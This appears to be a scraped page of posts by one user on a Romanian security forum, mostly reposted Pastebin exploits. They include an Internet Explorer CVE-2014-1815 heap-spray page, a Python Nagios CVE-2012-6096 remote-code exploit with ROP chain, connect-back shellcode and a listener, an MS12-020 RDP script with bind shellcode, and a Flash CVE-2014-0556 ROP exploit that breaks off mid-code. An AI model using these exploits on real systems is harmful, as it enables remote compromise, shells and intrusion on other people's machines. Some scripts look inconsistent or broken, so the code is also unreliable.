    Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3
  15. Nytro
    MUIE PONTA.
  16. Nytro

    Categorie Donatii

    Nytro replied to ZeroDoi's topic in Sugestii

    Vreau sa vad 20-30 de lucruri pe care le donati inainte de a va da cu parerea.
  17. Nytro
    Vineri e Owasp. Ne vedem acolo.
  18. Nytro
    Sunt cateva chestii utile, dar nu e cine stie ce. Forumuri interesante mai sunt: opensc, trojanforge, rohitab, tuts4you, kernelmode si multe altele. Si reversing.ro al lui @giv .
  19. Nytro
    CCleaner Pro Patching Tut by Kjacky Home Page: http://www.piriform.com/ Tutorial: CCP Sursa: EXETOOLS FORUM
  20. Nytro
    CVE-2014-1815 Html code - Internet Explorer 6-11 CVE-2014-1815 Html code 1: < !doctype html> 2: < html> 3: < head> 4: < meta http-equiv="Cache-Control" content="no-cache"/> 5: < sc?ript > 6: func?tion stc() 7: { 8: var Then = new Date(); 9: Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); 10: document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); 11: } 12: func?tion cid() 13: { 14: var swf = 0; 15: try { 16: swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { 17: } 18: if (!swf) 19: return 0; 20: var cookieString = new String(document.cookie); 21: if(cookieString.indexOf("d93kaj3Nja3") == -1) 22: {stc(); return 1;}else{ return 0;} 23: } 24: String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);} 25: var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1); 26: var ll=new Array(); 27: for (i=0;i< 3333;i++)ll.push(document.create?Element("img")); 28: for(i=0;i< 3333;i++) ll[i].className=tpx; 29: for(i=0;i< 3333;i++) ll[i].className=""; 30: CollectGarbage(); 31: func?tion b2() 32: { 33: try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){} 34: try{xdd.outerText='';}catch(exception){} 35: CollectGarbage(); 36: for(i=0;i< 3333;i++) ll[i].className=tpx; 37: } 38: func?tion a1(){ 39: if (!cid()) 40: return; 41: document.body.contentEditable="true"; 42: try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){} 43: try{document.selection.createRange().select();}catch(exception){} 44: } 45: < / sc?ript > 46: < /head> 47: < body onload='setTimeout("a1();",2000);' onresize=b2()> 48: < marquee id=xdd > < /marquee> 49: < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> 50: < param name="movie" value="storm.swf" /> 51: < param name="quality" value="high" /> 52: < param name="bgcolor" value="#ffffff" /> 53: < param name="allowScriptAccess" value="sameDomain" /> 54: < param name="allowFullScreen" value="true" /> 55: < /object> 56: < /body> 57: < body> 58: < form name=loading> 59: ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font> 60: ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> 61: ¡¡¡¡ 62: ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> 63: ¡¡¡¡< sc?ript > ¡¡ 64: var bar=0¡¡ 65: var line="||"¡¡ 66: var amount="||"¡¡ 67: count()¡¡ 68: func?tion count(){¡¡ 69: bar=bar+2¡¡ 70: amount =amount + line¡¡ 71: document.loading.chart.value=amount¡¡ 72: document.loading.percent.value=bar+"%"¡¡ 73: if (bar< 99)¡¡ 74: {setTimeout("count()",500);}¡¡ 75: else¡¡ 76: {window.location = "http://www.google.com.hk";}¡¡ 77: }< / sc?ript > 78: ¡¡< /p> 79: < /form> 80: < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p> 81: < /body> 82: < /html> Sursa: CVE-2014-1815 Html code - Pastebin.com
  21. Nytro
    CVE-2012-6096 - Nagios history.cgi Remote Command Execution #!/usr/bin/python # # CVE-2012-6096 - Nagios history.cgi Remote Command Execution # =========================================================== # Another year, another reincarnation of classic and trivial # bugs to exploit. This time we attack Nagios.. or more # specifically, one of its CGI scripts. [1] # # The Nagios code is an amazing monster. It reminds me a # lot of some of my early experiments in C, back when I # still had no clue what I was doing. (Ok, fair enough, # I still don't, heheh.) # # Ok, I'll come clean. This exploit doesn't exactly # defeat FORTIFY. This approach is likely to work just FINE # on other crippled distro's though, think of stuff like # ArchLinux, Slackware, and all those Gentoo kids twiddling # their CFLAGS. [2] (Oh and hey, BSD and stuff!) # # I do some very stupid shit(tm) here that might make an # exploit coder or two cringe. My sincere apologies for that. # # Cold beer goes out to my friends who are still practicing # this dying but interesting type of art: # # * brainsmoke * masc * iZsh * skier_ * steve * # # -- blasty <blasty@fail0verflow.com> / 2013-01-08 # # References: # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109 # [2] http://www.funroll-loops.info/ # # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n! # Next time you rebrand an exploit at least show some diligence and # add some additional targets or improvements, so we can all profit! # # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy! # import os, sys, socket, struct, urllib, threading, SocketServer, time from base64 import b64encode SocketServer.TCPServer.allow_reuse_address = True targets = [ { "name" : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)", "smash_len" : 0xc37, "unescape" : 0x0804b620, "popret" : 0x08048fe4, "hostbuf" : 0x080727a0, "system_plt" : 0x08048c7c } ] def u32h(v): return struct.pack("<L", v).encode('hex') def u32(v, hex = False): return struct.pack("<L", v) # Tiny ELF stub based on: # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html def make_elf(sc): elf_head = \ "7f454c46010101000000000000000000" + \ "02000300010000005480040834000000" + \ "00000000000000003400200001000000" + \ "00000000010000000000000000800408" + \ "00800408" + u32h(0x54+len(sc))*2 + \ "0500000000100000" return elf_head.decode("hex") + sc # interactive connectback listener class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0] print "[**] This shell is powered by insane amounts of illegal substances" s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True os.write(s.fileno(), "id\nuname -a\n") while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 5: print "\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>" print " >> \"Jetzt geht's Nagi-los!\"\n" print " usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target_no = int(sys.argv[4]) if target_no < 0 or target_no > len(targets): print "Invalid target specified" sys.exit(-1) target = targets[ int(sys.argv[4]) ] # comment this shit if you want to setup your own listener server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() # shellcode to be executed # vanilla x86/linux connectback written by a dutch gentleman # close to a decade ago. cback = \ "31c031db31c951b10651b10151b10251" + \ "89e1b301b066cd8089c231c031c95151" + \ "68badc0ded6668b0efb102665189e7b3" + \ "1053575289e1b303b066cd8031c939c1" + \ "740631c0b001cd8031c0b03f89d3cd80" + \ "31c0b03f89d3b101cd8031c0b03f89d3" + \ "b102cd8031c031d250686e2f7368682f" + \ "2f626989e3505389e1b00bcd8031c0b0" + \ "01cd80" cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex")) cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex")) # Eww.. so there's some characters that dont survive the trip.. # yes, even with the unescape() call in our return-chain.. # initially I was going to use some /dev/tcp based connectback.. # but /dev/tcp isn't available/accesible everywhere, so instead # we drop an ELF into /tmp and execute that. The '>' characters # also doesn't survive the trip so we work around this by using # the tee(1) utility. # If your target has a /tmp that is mounted with noexec flag, # is severely firewalled or guarded by trained (watch)dogs.. # you might want to reconsider this approach! cmd = \ "rm -rf /tmp/x;" + \ "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \ "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;" # Spaces (0x20) are also a problem, they always ends up as '+' # so apply some olde trick and rely on $IFS for argv separation cmd = cmd.replace(" ", "${IFS}") # Basic return-2-whatever/ROP chain. # We return into cgi_input_unescape() to get rid of # URL escaping in a static buffer we control, and then # we return into system@plt for the moneyshot. # # Ergo sum: # There's no memoryleak or whatever needed to leak libc # base and bypass ASLR.. This entire Nagios PoS is stringed # together by system() calls, so pretty much every single one # of their little silly binaries comes with a PLT entry for # system(), huzzah! rop = [ u32(target['unescape']), u32(target['popret']), u32(target['hostbuf']), u32(target['system_plt']), u32(0xdeafbabe), u32(target['hostbuf']) ] # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot # out of the box. Building HTTP requests from scratch is so 90ies.. params = urllib.urlencode({ 'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop) }) print "[>>] CL1Q .." f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params) print "[>>] CL4Q .." f.read() # TRIAL PERIOD ACTIVE, LOL! time.sleep(0x666) server.shutdown() Sursa: [Python] CVE-2012-6096 exploit - Pastebin.com
  22. Nytro
    CVE-2012-0002 - Remote Desktop Protocol (RDP) #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ############################################################################# import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import rdpNego #bind shellcode TCP port 4444 shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9' #Payload payload = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'; class SRVSVC_Exploit(Thread): def __init__(self, target, port=3389): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target def __DCEPacket(self): print '[-]Connecting' self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target) self.__trans.connect() print '[-]connected' % self.target # Making teh packet self.__stub='\x01\x00\x00\x00' self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub+=shellcode self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x00\x00\x00\x00' self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub+=payload self.__stub+='\x00\x00\x00\x00' self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3' return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.' if __name__ == '__main__': target = sys.argv[1] print '\nUsage: %s <target ip> \n' % sys.argv[0] sys.exit(-1) current = SRVSVC_Exploit(target) current.start() Nota: Syntax highlight asta jegos pune de-am-pulea niste spatii. Luati de la sursa. Sursa: [Python] CVE-2012-0002 - Pastebin.com
  23. Nytro
    [h=1]CVE-2014-0556[/h]By: hdarwin on Sep 27th, 2014 (edited) By: [URL="http://pastebin.com/u/hdarwin"]hdarwin[/URL] on Sep 27th, 2014 (edited) [LIST=1]/* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020 eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 4141411c ?? ??? */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.system.Capabilities; import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version) private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) { vector = ob[i1][0xFFFFFFFF - i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break }else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) { vector = ob[i1][i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { str += "\n\nDump Vector<Object>" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t" } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } str += "\n\n*** V-Table Modify ***" write(ob[i0][i2 + 1] - 1, vector + 8) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } ============================================================================================================================= /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 